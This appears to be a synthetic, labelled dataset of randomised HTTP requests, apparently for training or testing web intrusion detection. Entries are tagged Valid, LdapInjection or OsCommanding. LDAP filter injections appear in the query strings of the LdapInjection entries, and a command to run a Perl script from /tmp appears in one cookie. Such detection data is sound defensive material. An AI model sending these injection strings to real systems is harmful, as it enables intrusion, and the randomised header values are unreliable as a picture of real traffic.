Cookie: s7jnm=vj;xx1wW98Z=86
Cookie2: $Version="732"
Date: Fri, 05 Nov 04 01:40:29 CET
ETag: "s4yv0U_e2@2Rjip"
Expect: eWldKuo
From: sguefot@nd3dact2t0.ch
If-Modified-Since: Mon, 26 Dec 05 07:19:22 CET
If-Unmodified-Since: Sun, 03 Feb 08 19:16:05 CET
If-Match: *
If-None-Match: "YptL3vtkr56ly8z"
If-Range: "i4Xo9I8RKaHHIPPhXG-"
Max-Forwards: 740
MIME-Version: 8.4
Pragma: dm=iE
Proxy-Authorization: NTLM NWd0dmF3b3Jmb0x0ZGliaXdtcG91bnNoZWxzaHJkbW9taGFkbjZnbXQ3dA==
Authorization: NTLM b3N5ZHR0ZWFpcHVkZzhuMGVpNnJmc21lbm43aG1sZWEyaDRoZnhaYWx0ZG41Nmxo
Range: -7418,428-0
Referer: /szrGl3c/riLtzv/nfaorslf/befetee/miemnha.tiff
TE: trailers,gzip;q=0.5,trailers
Trailer: Expect
User-Agent: wthGysrD/4.4.8
UA-CPU: StrongARM
UA-Disp: 501,097,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 995x932
Via: 7.5 www.ttSO.png
Transfer-Encoding: deflate
Upgrade: ovAeer/6.4, irvwrQ/0.5, snd8l/4.6, ann/7.0
Warning: 076 www.tlWems.gif "aretamgt" 
X-Forwarded-For: 229.28.6.246
X-Serial-Number: 757195362418
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

lnohaencasbrs=34&iazrainI=st37_mG6eJA&erdt3e=aAHamfGnBj&aehjtmd=nRe&utas4anrieb=tnTntbt&Fte=mochapasswdnode&elmn4aL63mn=li&to=mrzreuroelporn42h&bteennpi=dekgaeytbos&t7olisntM=ro4nwroe&iehks=wp-ipt&fpr=066252&gNs9e7ehuemi3F=uterps/isr&nrasEoeekt=tsrhbfptwiefreo&a6t9beso=e ewpidk/pewin

End - Id: 34411
Start - Id: 17456
class: Valid
GET /pBhfteoacssN/oi5so7fgVmr.css?positiongroup byperl5GjwinntSV.2=aLeoqit%40tvbscriptgastx&Imytarei7jlmt=5&htre0ncstaN37n=496&DohDtemoS7b=%7Ce&Ir1qd3hekh3n=01950873&ehenoelcu7n=moexg5gnoDrrhndl&anoh1eisagO=09144 HTTP/1.0
Host: www.tmsDsro0.ch:80
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: iso-2022-jp;q=0.2, x-mac-ce
Accept-Encoding: gzip
Accept-Language: *
Cache-Control: no-transform
Client-ip: 141.4.227.36
Cookie: wEryoa5he=xEJ.
Cookie2: $Version="950"
Date: Mon, 19 May 08 09:58:10 CET
ETag: "RuPs3VGzuim5Bb1f"
Expect: aunieea5
From: eohgx@txte4.gov
If-Modified-Since: Mon, 23 Mar 09 16:24:23 UTC
If-Unmodified-Since: Fri, 28 Mar 08 24:17:50 CET
If-Match: "@PEhNeE1VxDONJwJyohy"
If-None-Match: "t7lMfbCtxG07YP26ySBl"
If-Range: "sJ_eb-nq7s0MA0T"
Max-Forwards: 4066
MIME-Version: 0.4
Pragma: cc=ela
Proxy-Authorization: NTLM RXNzaXR0aWFpZXpycmVkZHdvMGtJZGxpZWhoZW9nb3QzMWFidHRiZXJhYUxuaGc=
Authorization: NTLM eEU0d2FhMG5yOHplcm5kc21laHdjZWVoaWNlc2xvcm1lZGlqZXd6aGZrSWFy
Range: 676-
Referer: http://www.hhehu.gov/eut0locn.tiff
TE: gzip;q=0.1,gzip,gzip
Trailer: Authorization
User-Agent: Mozilla/4.9 (Windows; U; WinNT 0.4; Oy-e7; rv:5.9.7) Gecko/96246019
UA-CPU: MIPS
UA-Disp: 779,0995,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 211x6880
Via: HTTP/6.3 245.92.75.31:62666, HTTP/6.1 100.42.226.146:04909
Transfer-Encoding: deflate
Upgrade: aAc/1.9, ntnoe/0.6, faiehi/4.5, ttsl/3.1
Warning: 211 109.34.244.12 "yezUa83tnoebkfw" 
X-Forwarded-For: 29.239.233.138
X-Serial-Number: 4864116530046414
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17456
Start - Id: 19325
class: Valid
GET /2xfSw/ZVYwindow.openduFqvX/zp/emBWHR9chsTGUrf7/ybNsTssl9stNe/yVVE19FriframeIK./5irntded5y/rh/zN/stceWeevDesyh.jpg?ree7=871&oDonxsdczd=h+&ebw=1871944&st=128&egtwtsiretnn=0&tseitthb7oroi=xemct HTTP/1.0
Host: www.nyan.cz
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 33.79.28.5
Cookie: oshe=rgUxJCJzD598;rpaaeisonToe=68964
Cookie2: $Version="499"
Date: Mon, 23 Jun 08 10:48:06 CET
ETag: W/"igqT2gr0yd1-bNxH4zEJ"
Expect: t1he=ueEe;Eseeceh=eoruc
From: Zda4pbA@utsheoe.biz
If-Modified-Since: Sun, 24 Jul 05 01:58:38 GMT
If-Unmodified-Since: Thu, 30 Oct 08 13:38:02 GMT
If-Match: *
If-None-Match: "Q6LcGZ7r_kWKpJm2"
If-Range: Sun, 13 Apr 08 21:03:57 UTC
Max-Forwards: 37
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: NTLM b25pYXJlaXRpbGMwbmNkdnRzb2Fjc2RvNml0bWlSZXNobGxsaWVkSHBuaQ==
Authorization: eowNin hunn5oo9=e2eLant
Range: 32-,34539-5523,215-7
Referer: http://heAy7sie.com/pBzips7/aposfvw/vauu.htm
TE: gzip;q=0.2,trailers,trailers
Trailer: Accept
User-Agent: Mozilla/0.0 (Windows; U; Windows NT 5.2; ue-jd; rv:6.3.6) Gecko/97599089
UA-CPU: StrongARM
UA-Disp: 589,2791,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 5443x8172
Via: jotnq/2.3 108.176.1.37, 0.9 www.r8ilEy.jpeg
Transfer-Encoding: compress
Upgrade: sahcq/0.1
Warning: 333 161.38.217.77 "ytiqpMa5" 
X-Forwarded-For: 83.53.98.240
X-Serial-Number: 0947873125180577061
----: -------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 19325
Start - Id: 7349
class: Valid
POST /smpimpedAdx/k_XTMQOIihnodeWlib/KQ/aLois/tS7XL.gRfOUu@9JAVv/dnnhrjleki4aesl/o.Ym5332f/in6-ledDv.pl? HTTP/1.1
Content-Length: 242
Content-Language: o0le2rg,di,za5
Content-Encoding: compress
Content-Location: /ornns/medcnos/uR8s.tiff
Content-MD5: YmJ1aW1lamlsaEFpbmlxYg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 05 Feb 04 22:45:36 CET
Last-Modified: Sat, 10 Jun 06 14:03:09 CET
Host: 117.110.37.151
Connection: thuad
Accept: image/jpeg, video/*;q=0.3, audio/basic
Accept-Charset: *
Accept-Encoding: deflate, gzip, compress;q=0.3, compress;q=0.5, deflate;q=0.4
Accept-Language: g-q, qoD-9etooeg;q=0.4, eHeLlf-nnri;q=0.0, eAuwrado-nfrcol
Cache-Control: only-if-cached
Client-ip: 127.183.145.17
Cookie: ogbontb3n=deioaa;f7mufNr=n;opnotumlje=httpec'aoxterm;iease=77392301;e9ceiilhAid=9515794;O9cQOfbetweenimgdropN8=Lcatyadmindna
Cookie2: $Version="61"
Date: Mon, 29 Jun 09 15:08:41 UTC
ETag: "ku03okQOvBZ8jpeB"
Expect: 100-continue
From: paelsta@Bijzxj.uk
If-Modified-Since: Tue, 29 Aug 06 18:51:43 CET
If-Unmodified-Since: Fri, 08 Jul 05 01:29:25 GMT
If-Match: "kDRxuCgDlpJo0nIgi"
If-None-Match: "NuuA2ptE-ehVutACWXl"
If-Range: Sat, 15 Oct 05 14:44:42 GMT
Max-Forwards: 7
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: r5it7 xtlcz=Plhl65g5
Authorization: naodb lifvr5e=sa9to
Range: -812543
Referer: /83oYdlc5/xasb/jooarn2.sh
TE: chunked;q=0.6,gzip,trailers
Trailer: User-Agent
User-Agent: Mozilla/8.4 (compatible; Konqueror/1.2; WinNT; eobi)
UA-CPU: StrongARM
UA-Disp: 457,861,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 965x983
Via: 5.4 www.e1gs0q.png, po7qti/5.2 238.7.87.251:84, FTP/9.1 212.242.15.228
Transfer-Encoding: m6ae
Upgrade: mtg/7.7
Warning: 833 116.43.43.166:1 "sgrtanet0w" 
X-Forwarded-For: 181.117.178.72
X-Serial-Number: 33978029627174385263
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

0unrc=sr qprocessing-instructionn&UOJ@V6PLZUu=haeri&00=9244812&8cxtr4nedvt=oO5lBjTa.cU&is=2457&PlUC4CCRhttps=kFBJqrx3V-a&tklwkR7iEe=fijhnwe&oet6ale=97806743&OnoV=moc:gosayt&t9dwtkdlye6sat=9423016548&atejfAec=tiedroptHid3in&IpRiItfsqsk8t= as

End - Id: 7349
Start - Id: 9839
class: Valid
GET /nZqozM9sJgB_5otN.exe?opbQeval=90222&alte=sV%3C%5Bwrma%28-ewhereao5tDer&5sasanrth=freplace6s%7Cadmintkhhjbe8y&c1uqhTIHEy=tghw&iAolnm4s5n0ar=ery&byeirecfl=Sbnyat&oG9ituIuacdw=21272891 HTTP/1.0
Host: 109.102.193.210:566
Connection: close
Accept: text/html;q=0.8
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: sh-tbY4Y, jtmtdrta-imrt;q=0.6, oane-g;q=0.4, IoRhEt-Oagsie;q=0.4, pfp3-n4;q=0.2
Cache-Control: no-store
Client-ip: 172.53.112.7
Cookie: tAdhwo=flall7paLu2(g;rdeluyeckaR=>hipndvi2=zo;am=70637;iaeifsctnait=kaCLlRTQ
Cookie2: $Version="34"
Date: Sat, 21 Apr 07 18:02:45 GMT
ETag: "ToKnTU7bGHwMHSKsu"
Expect: Tiedr
From: eiuie74@cpahSn6aa.fr
If-Modified-Since: Tue, 17 Oct 06 01:12:45 CET
If-Unmodified-Since: Tue, 29 Sep 09 13:49:57 UTC
If-Match: "Qx_0YVT1wqqjxnQt"
If-None-Match: *
If-Range: Fri, 15 Aug 08 08:45:51 UTC
Max-Forwards: 570
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Basic ZGEyY3JlOmJ3aWgw
Authorization: buh2 eiii=mwc5kif
Range: -820868
Referer: /tt2eU.png
TE: chunked,deflate,trailers
Trailer: Upgrade
User-Agent: Mozilla/0.9 (X11; U; SunOS sun4u 9.7; id-hd; rv:6.4.3) Gecko/38130988
UA-CPU: 68000
UA-Disp: 2395,2447,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 3832x6503
Via: 2.4 www.tpcaptt.htm
Transfer-Encoding: deflate
Upgrade: apYvoi/7.8, geeoh/4.9, eity/4.7, d3ue/6.8
Warning: 359 www.omvimkcn.html "tdHnehjio" 
X-Forwarded-For: 59.15.240.43
X-Serial-Number: 09946739061718
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9839
Start - Id: 37107
class: LdapInjection
GET /khnce1ots2ase/qufLUsPjOdRG8-QS/aurvfhbtuea.css?eeeooioehdabave=126%29%28%26%28objectClass%3Dyin%29%28%7C%28sn+++%3D+++msln%29%28cn%3Diude+J*%29%29&wso=67560 HTTP/1.1
Host: www.iwopa.st
Connection: 1gne5ge
Accept: video/mpeg, image/gif
Accept-Charset: *;q=0.3
Accept-Encoding: compress;q=0.1, gzip, deflate, deflate
Accept-Language: rWuwr-Oco4nr, iez-otetr;q=0.5, 1a-h0eyHxi
Cache-Control: max-stale=6
Client-ip: 118.166.126.189
Cookie: XJMq.wr=2iHhciltrltt;movlebetweenm=568;kiglhtrti1elch=yenef8siHaex6eikho;sisaizoeerrT='uekmsog Ae 0Em;nGaois0mho4nn1=24465;aimtitAhlteRS=046
Cookie2: $Version="8"
Date: Wed, 14 Dec 05 09:32:02 UTC
ETag: W/"xd@6ixSS3TZ3a9Iy"
Expect: gtPqvlrf=Lwdh
From: moaqfoa@te8R.fr
If-Modified-Since: Tue, 29 Sep 09 16:12:50 GMT
If-Unmodified-Since: Sat, 04 Aug 07 04:31:54 CET
If-Match: *
If-None-Match: "8-RLX5n_yi0ai_O"
If-Range: Thu, 30 Dec 04 24:56:45 UTC
Max-Forwards: 732
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Basic ZWVKbmI6ZGk1OHI=
Authorization: Digest uri=/atel/hrasesEa.fgf
Range: -9071,2584-
Referer: http://Telyiyt.st/od5a/neiat9w/6otRnRis/etnerf.jpeg
TE: chunked,gzip;q=0.2
Trailer: Via
User-Agent: pzGOq4U http://www.tde0L8fq.it
UA-CPU: 68000
UA-Disp: 529,581,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 617x3755
Via: HTTP/8.5 71.136.249.12, 9.1 www.SDshasur.shtml
Transfer-Encoding: ssaiun; saaanr=elEnru
Upgrade: mgse/4.2, 8bsdf7/3.6, teRe/7.8
Warning: 199 www.elcE7aks.shtml "cetxttaetiha" "Mon, 13 Oct 08 07:41:45 CET"
X-Forwarded-For: 67.99.234.48
X-Serial-Number: 85332942046227560401
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37107
Start - Id: 13628
class: Valid
GET /fsroq6Zvintee3d/ic6s/eqMEt6TGFS.A_EpKAb/hE_PpwDvB4t-ZLWYhLd2.jsp?hIZ17NYeJservicesG=8&tdh7O=+&hels6tt=31&sm6te7c=ba6+a HTTP/1.1
Host: www.uatsn.biz
Connection: zma6hput
Accept: */*;q=0.3
Accept-Charset: x-mac-chinesesimp;q=0.0
Accept-Encoding: 
Accept-Language: nnmcr-oIcsoshb;q=0.3, flUhte0o-oy, fedepac-ygetior, ti-eo;q=0.5
Cache-Control: only-if-cached
Client-ip: 63.99.161.90
Cookie: ha=urysiltfhstr1nps
Cookie2: $Version="8"
Date: Sun, 25 Apr 04 13:56:29 UTC
ETag: W/"xd.yKEeF5Mw-TmNlg"
Expect: 100-continue
From: ednsif0g@o99ssn.be
If-Modified-Since: Sun, 02 May 04 17:03:56 GMT
If-Unmodified-Since: Sat, 14 Nov 09 21:06:51 UTC
If-Match: "R8RbRvBJbEL1xLdqlu"
If-None-Match: "uGaZtvlJ46tGEqn-_m@"
If-Range: "S-YRXpp@uYyHJH11F4"
Max-Forwards: 817
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: evYe vtutcenr=svCN1T
Authorization: Digest nc=F66eAea0
Range: 61-
Referer: http://2dab0w.org/ccsr/uisdoz7.php4
TE: trailers,trailers
Trailer: Warning
User-Agent: ecfues/5.5.0.2
UA-CPU: PowerPC
UA-Disp: 0811,7383,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 1926x6601
Via: FTP/4.9 71.125.152.249, 1.9 142.173.157.101
Transfer-Encoding: cHat
Upgrade: xAwDhi/6.3, egwu/9.7
Warning: 242 www.aseaogr.html "nerangaikenWialAe" 
X-Forwarded-For: 221.57.39.147
X-Serial-Number: 7185316182193788
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13628
Start - Id: 10611
class: Valid
GET /hEnrXkeuityrhpnniim/deIo2bq.sh? HTTP/1.1
Host: 248.231.161.223
Connection: close
Accept: application/x-tar;q=0.7, audio/x-wav, video/*;q=0.2
Accept-Charset: windows-874;q=0.3, koi8-r, windows-1252, x-mac-roman;q=0.9, euc-cn;q=0.8
Accept-Encoding: *
Accept-Language: umi-llen;q=0.5, aassamfr-o6p8oiUn, ohdiAc0-e, t-gotscoe;q=0.1
Cache-Control: min-fresh=5
Client-ip: 255.234.163.107
Cookie: Soin=idahitworadnselpby;tle2iei=otc(buylvbscripta zre8AHuX;ta=<;ianUt=t;dto;b1YivE6=804950;tr3oflon0=dpsk
Cookie2: $Version="1"
Date: Mon, 25 Jan 10 20:39:49 UTC
ETag: "iaG3z2qLb8jcLG4l"
Expect: 100-continue
From: urh4ame@uIj4a1nz.ch
If-Modified-Since: Tue, 09 Jan 07 02:39:53 UTC
If-Unmodified-Since: Fri, 08 May 09 19:49:49 GMT
If-Match: *
If-None-Match: *
If-Range: "7yOo7yKmV2xwkyF-"
Max-Forwards: 39
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Basic MmxvcGlvbDpkaWlvRHJy
Authorization: Digest username="tnves"
Range: 757-,8584-
Referer: http://saite9nt.gov/6etbe/nmisqF.php3
TE: trailers,gzip;q=0.8,trailers
Trailer: If-Unmodified-Since
User-Agent: mnA7aM39da (eEDkbc1; hhePxw; 4rs@C4l; jBqnlGl1_; oBatUd4DrQ)
UA-CPU: Sparc
UA-Disp: 4542,2926,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9748x5631
Via: FTP/7.0 www.f1awtIhg.shtml, 2.4 www.nnt2e7Rd.htm:62, 7.5 16.9.169.179
Transfer-Encoding: compress
Upgrade: telnx/9.9, iusnr/3.5
Warning: 595 239.203.101.239 "rlhjs5iafegTthd" "Tue, 05 Feb 08 07:12:57 UTC"
X-Forwarded-For: 93.154.42.186
X-Serial-Number: 719045121636524930
----: ---------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 10611
Start - Id: 37058
class: LdapInjection
GET /.hVL4ppnEdBr/Mesry2tCginP/CinhtpassRcTYamAv/6n4ujT4iyl5/esiaxb4Sue.shtml?ygjfhYSqJK=stsp%29%28%26%28objectClass++%3D+ei*%29&xIaiBUI=4061204 HTTP/1.1
Host: 237.66.171.164
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: x-mac-chinesesimp;q=0.5
Accept-Encoding: 
Accept-Language: ss-iaw4rls;q=0.2, wuik3r-y;q=0.1
Cache-Control: no-cache
Client-ip: 52.88.110.99
Cookie: ule=tsgLrwr
Cookie2: $Version="68"
Date: Tue, 13 Jan 09 10:17:54 GMT
ETag: "EHiX6-deO9OfaYi"
Expect: 100-continue
From: umuI@4eritQe.de
If-Modified-Since: Sat, 16 Feb 08 05:55:14 UTC
If-Unmodified-Since: Sun, 02 Oct 05 02:56:45 CET
If-Match: "tam9Wvcj.NPBOl5OhObA"
If-None-Match: *
If-Range: "7m9WfhjVOnU_oEi"
Max-Forwards: 444
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: Digest opaque="isetlaxp"
Authorization: Basic bWFyczpzcm9hb3B1
Range: 03242-,-0
Referer: /j4eeohe/nede9Wlz/rdoh.css
TE: gzip;q=0.6
Trailer: Pragma
User-Agent: Mozilla/0.2 (Machintosh; U; PPC 4.4; st-oi; rv:2.5.1) Gecko/32529599
UA-CPU: PowerPC
UA-Disp: 428,496,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 1905x9959
Via: HTTP/6.2 www.OpSNh.js, HTTP/7.7 151.99.94.185:30
Transfer-Encoding: gzip
Upgrade: ESst/3.1
Warning: 047 34.25.200.147 "rrtrnbieiteop" "Sun, 03 Feb 08 04:41:40 UTC"
X-Forwarded-For: 240.144.131.32
X-Serial-Number: 595061014884085769
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37058
Start - Id: 311
class: Valid
GET /fwQhM0OP-PPp/ncvk2K/wRlNdoqnPtrQs4/eWunaYICpc8gzO/ozt1Rf/U3.htm?rfslnd8wkere=6188466&62le=r&trxon2krtti=rz%26rcpa&fuTx=xp%28d%28+&nxthimd=plu1&BonSunc=Ghq&uotsrtzt=404784&4od8nakyrcn6=53621470 HTTP/1.0
Host: 94.133.121.233:80
Connection: keep-alive
Accept: image/jpeg;q=0.9, application/zip;q=0.4
Accept-Charset: iso-8859-8;q=0.3, x-mac-japanese
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 157.214.192.75
Cookie: sesgls7uqiYieae=41828528;4fnpn79isicte=81;LGmail-m=chgtio
Cookie2: $Version="39"
Date: Thu, 13 Oct 05 11:20:15 GMT
ETag: W/"jTbSqdDa@K_hIR0n3"
Expect: 100-continue
From: rsnIsn@bfod.it
If-Modified-Since: Thu, 15 May 08 15:39:20 GMT
If-Unmodified-Since: Wed, 09 Mar 05 05:01:23 GMT
If-Match: *
If-None-Match: "NWZX66FoRnWfcd8@v-1a"
If-Range: "QVhjhduN7j_erxogQ"
Max-Forwards: 2956
MIME-Version: 7.6
Pragma: nmet5i=n
Proxy-Authorization: ye6h yMsthsrA=atyake
Authorization: Basic ZWN3ZW9vM2k6cndscHR1YWE=
Range: 018198-760671,-91
Referer: /rnetiat/oiduoibb/neiAe/bysmetat/sxfi.html
TE: chunked;q=0.5
Trailer: Authorization
User-Agent: lsaooeptdlne5lzrjos
UA-CPU: x86
UA-Disp: 4451,828,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 4622x2387
Via: 0z57/0.5 99.30.170.87, 6.5 www.srutWcid.css, 4.2 www.b2iepr.css:2
Transfer-Encoding: hl9me; naeRip=ltNrwe
Upgrade: miT2r5/5.1
Warning: 753 172.218.58.231 "ldoa" "Wed, 20 Apr 05 05:59:53 UTC"
X-Forwarded-For: 167.169.89.86
X-Serial-Number: 94210
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 311
Start - Id: 11709
class: Valid
GET /evx9.png?6ylTQO=3272299&eoerapytjh=8317067&rr=%2Bc+e&trnod1=nilt4tmpewe0tehau9&riyrslecssrttd=sx&Jopenxterm92QandZ=qXDhldSziHt&eauip=shutdownh HTTP/1.1
Host: 195.42.9.63
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: iso-10646-ucs-2;q=0.9, iso-8859-3
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 228.241.203.171
Cookie: 3iaUaRhdIsa=175;ai4ep7dts2e=7637;FLVVnull=h;vameoheiOoye=4422217822
Cookie2: $Version="60"
Date: Sat, 17 Jul 04 07:37:09 UTC
ETag: "XPJwXZdQxVbMljj49"
Expect: 100-continue
From: sirxnDi@0oociO.fr
If-Modified-Since: Sat, 19 Apr 08 17:23:50 UTC
If-Unmodified-Since: Thu, 22 Jul 04 21:10:34 CET
If-Match: ".wAAcK-WcSiiZb3Y"
If-None-Match: *
If-Range: Mon, 19 Jan 04 19:58:07 CET
Max-Forwards: 6661
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Digest opaque="ciapc"
Authorization: NTLM NjZlZWVOb2V0dkV6UmVpYWV5SGVlZ2hpZWd0dG1hdDB0NUV1ZU9X
Range: 9808-4454,-4,572-193568
Referer: http://www.k0tygrde.de/maop/etfifheH/vEuo.htm
TE: trailers,trailers,trailers
Trailer: Accept
User-Agent: 7nsofit
UA-CPU: x86
UA-Disp: 940,7536,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 8474x4418
Via: HTTP/9.7 www.oiai.htm
Transfer-Encoding: gzip
Upgrade: tg2r/9.0, fere/5.1, Samd/0.1, iasFl/4.6
Warning: 482 www.edeet.html "st2tianaieN" 
X-Forwarded-For: 129.43.76.8
X-Serial-Number: 2344723441
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 11709
Start - Id: 5207
class: Valid
PUT /i22GJU/trseoo9eayh/OreplaceEy/l5V/ECPpasswdwR.Zgroup bymy/wylniHetet0ocesA8E/jnsoakudhandp1tovl.css? HTTP/1.1
Content-Length: 194
Content-Language: yastEa
Content-Encoding: compress
Content-Location: http://gyg0g0a.be/sn8ieve/8stxa.jpeg
Content-MD5: YWxiTmFubm5wcmFpdHdldA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 23 Dec 08 22:32:52 UTC
Last-Modified: Tue, 16 Aug 05 08:45:53 GMT
Host: www.e8eefsst.it:80
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: m='e'
Client-ip: 65.23.172.54
Cookie: nN=httpnacatnph-eCn ;gnhoe=opbnBo1ncQeaiid
Cookie2: $Version="44"
Date: Mon, 23 Feb 04 13:23:36 GMT
ETag: "WR.Su@z.QWOF3aCCOR"
Expect: 100-continue
From: rbstcLe8@fi0i.uk
If-Modified-Since: Thu, 10 May 07 01:09:35 CET
If-Unmodified-Since: Wed, 16 Jan 08 12:00:20 CET
If-Match: *
If-None-Match: "NYLL6DP30P6o1ZUh"
If-Range: *
Max-Forwards: 3719
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: NTLM ZWU3ZXJOc2luOWloYWV1aWl2b2h1bzc5YW14bmhIcmVvZQ==
Authorization: yhtpx l6tnf=Twlsss
Range: 842322-
Referer: http://www.geyzacl.net/nhgTe/bgsi8srl/SDOo/vafyit/atveta.shtml
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/0.3 (X11; U; Linux i586 3.4; n4-b0; rv:3.3.1) Gecko/69380189
UA-CPU: MIPS
UA-Disp: 696,288,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 523x221
Via: FTP/4.9 www.uo3t.tiff, Ere/4.0 www.E2ti.htm:52695
Transfer-Encoding: identity
Upgrade: KrhdGB/4.0, shDEy/8.3, qefaou/5.5, axat/2.9, hEyue/8.6
Warning: 646 www.eBtlm.js "taDea3t" 
X-Forwarded-For: 121.55.87.94
X-Serial-Number: 083639126
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

ntE=H;nltmqTtadmin]fh|t&ia=10138&aatcee=>n&tdaielu=mri&8null0HP2T_D63=rBq1OhtmZ&itallaurennap=aYN&coqeogct3v=n6avrahlbwtNet2e&OhBpCi=1do9er@ mmthirhxtg&gizx4elA=tKN-FfA8U&bttaise=71128

End - Id: 5207
Start - Id: 43641
class: OsCommanding
PUT /i@@zti/reiNniu0piruthnejwu/ot/spqTOiu.@70mqP/tpfzJYbj.lMVyv3WAs4y/IQL/nF3Hz18.eX-fnK9Y0/6YUGR8H/rpPEF9/inhstsU/qSKrW@FdV6pdRiMi/teap.png? HTTP/1.1
Content-Length: 126
Content-Language: gIoomaC,5i2ts,mhncee
Content-Encoding: deflate
Content-Location: /os3toh.nsf
Content-MD5: aW02UGhtcFNlbnNTdXRoTg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 24 May 08 08:02:55 GMT
Last-Modified: Tue, 01 Feb 05 20:38:56 UTC
Host: 62.115.122.11
Connection: close
Accept: */*
Accept-Charset: iso-8859-7, koi8, windows-1258
Accept-Encoding: compress, compress, identity;q=0.1
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 95.136.14.248
Cookie: 7NvUtnZZ1Hj=eXAb;eor=aeoroal4;RKcopyZJedKUpV=reewy;2Oqna=65997778;jeTltr=icE-YVrg;uy=/perl /tmp/antrgede.pl -p7088
Cookie2: $Version="636"
Date: Sat, 06 Mar 04 09:20:53 CET
ETag: W/"SoaTPs1nfTwM67J"
Expect: nsiiEes
From: hseet@mdxc.uk
If-Modified-Since: Fri, 24 Jul 09 02:01:49 GMT
If-Unmodified-Since: Mon, 15 Sep 08 05:30:34 GMT
If-Match: "eF6YdKrZwfglY@lED"
If-None-Match: *
If-Range: *
Max-Forwards: 8118
MIME-Version: 0.3
Pragma: sbt=8qnswrbi
Authorization: Digest uri=/2ntwT/wyehoz2/ghoA9b/lc7et1nv.gif
Range: -3449
Referer: /ddatzwa3/Eeyat6l/knjr.mdb
TE: trailers,trailers,trailers
Trailer: Upgrade
User-Agent: lstIv5/6.7.5
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 484x3782
Via: FTP/1.8 248.94.27.196, 3.4 123.195.64.81
Transfer-Encoding: compress
Warning: 071 247.59.205.202 "tlssouninsc" 
X-Forwarded-For: 136.80.200.196
X-Serial-Number: 510031428573357
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

lt8tnaeqvohl=utae0i6e&pRwaldK8ewnm=t reld-i>formaA&mrMar6u=eTdaehs  )k0atsel&haptmtd=wpgq.yqC@XAU&sna=7499433&stm=oatyUt

End - Id: 43641
Start - Id: 32911
class: Valid
PUT /dwtnjilLpytaL7a2inj/oRNEmPMjiSe/JFvnAAupL/mioKiframekHW8eP8/pJzceqV-X3kNnwad/eseici2mn6abT27g.png? HTTP/1.1
Content-Length: 154
Content-Language: ii
Content-Encoding: gzip
Content-Location: /StwK/LiiFnriF/alas.gif
Content-MD5: dHVxYmZ0Zk1mc2ZldTBlZw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 10 Mar 07 09:09:49 GMT
Last-Modified: Fri, 16 Feb 07 07:12:23 GMT
Host: 42.171.221.201
Connection: aktero
Accept: */*
Accept-Charset: iso-2022-kr, iso-8859-2;q=0.9, macintosh;q=0.1
Accept-Encoding: *
Accept-Language: bj-qSIscw9G, oeteQszy-sald5ci
Cache-Control: max-stale=0118
Client-ip: 80.69.27.122
Cookie: nss6reihmE=hhtiaemdct;hdq3=4286;vglkm= lrilibSconnectslikeihautoexec(q[ie;scriptR-@=90805;gciettondket=38509403
Cookie2: $Version="8"
Date: Fri, 19 Jan 07 08:48:07 GMT
ETag: W/"olVvPMZcrsyDvc@c"
Expect: 100-continue
From: Qtafer@rrotHx.be
If-Modified-Since: Sat, 03 May 08 18:27:25 CET
If-Unmodified-Since: Wed, 19 Dec 07 21:21:06 CET
If-Match: *
If-None-Match: "64Zb2VCAZO@ugYAl8dOb"
If-Range: "vE7PW8DvIOP.Znu_CzE"
Max-Forwards: 0800
